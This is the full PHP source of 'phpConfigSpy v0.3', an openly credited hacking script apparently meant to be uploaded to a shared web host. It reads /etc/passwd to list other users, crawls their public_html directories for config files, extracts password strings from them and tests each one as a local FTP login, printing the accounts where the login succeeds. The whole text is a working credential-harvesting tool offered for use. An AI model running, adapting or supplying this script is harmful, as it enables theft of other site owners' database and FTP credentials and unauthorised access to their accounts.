Code:
<?php /* h-b@usa.com */ echo '<html><head><title>phpConfigSpy v0.3</title></head><body>'; ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>'); set_time_limit(0); ################### @$passwd = fopen('/etc/passwd','r'); if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); } $pub = array(); $users = array(); $conf = array(); $i = 0; while(!feof($passwd)) { $str = fgets($passwd); if ($i > 35) { $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = '/home/'.$username.'/public_html/'; if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username); array_push($pub,$dirz); } } } $i++; } ################### echo '<br><br><textarea cols="80" rows="60">'; echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"; echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"; echo "[~] Searching for passwords in config files...\n\n"; foreach ($users as $user) { $path = "/home/$user/public_html/"; read_dir($path,$user); } echo "\n[+] Done\n"; function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath = "$path$file"; if (($file != '.') and ($file != '..')) { if (is_readable($fpath)) { $dr = $fpath."/"; if (is_dir($dr)) { read_dir($dr,$username); } else { if ( ($file=='config.php') or ($file=='config.inc.php') or ($file=='conf.php') or ($file=='settings.php') or ($file=='setup.php') or ($file=='order.php') or ($file=='dbconf.php') or ($file=='db.inc.php') or ($file=='dbconfig.php') or ($file=='configuration.php') or ($file=='adminconfig.php') or ($file=='configoption.php') or ($file=='ini.inc.php') or ($file=='configitem.php') or ($file=='db.inc.php') or ($file=='dbconnect.php') or ($file=='conf-init.php') or ($file=='dbinfo.php') or ($file=='connect.php') or ($file=='configure.php') or ($file=='smtp.php') or ($file=='include.php') or ($file=='index.php') or ($file=='common.php') or ($file=='config_global.php') or ($file=='admin.php') or ($file=='db.php') or ($file=='connect.inc.php') or ($file=='dbconnect.inc.php')) { $pass = get_pass($fpath); if ($pass != '') { echo "[+] $fpath\n$pass\n"; ftp_check($username,$pass); } } } } } } } } function get_pass($link) { @$config = fopen($link,'r'); while(!feof($config)) { $line = fgets($config); if (strstr($line,'pass') or strstr($line,'pwd') or strstr($line,'db_pass') or strstr($line,'dbpass') or strstr($line,'passwd')) { if (strrpos($line,'"')) { preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass); $pass = str_replace("]=\"","",$pass); } else preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass); $pass = str_replace("]='","",$pass); return $pass[2]; } } } function ftp_check($login,$pass) { @$ftp = ftp_connect('127.0.0.1'); if ($ftp) { @$res = ftp_login($ftp,$login,$pass); if ($res) { echo '[FTP] '.$login.':'.$pass." Success !\n"; } else ftp_quit($ftp); } } echo '</textarea><br><br>Coded by <b>Hack-Back</b> & <b>config-location-2@@8</b> <a href=http://www.hac-zone.com></a></body></html>'; ?>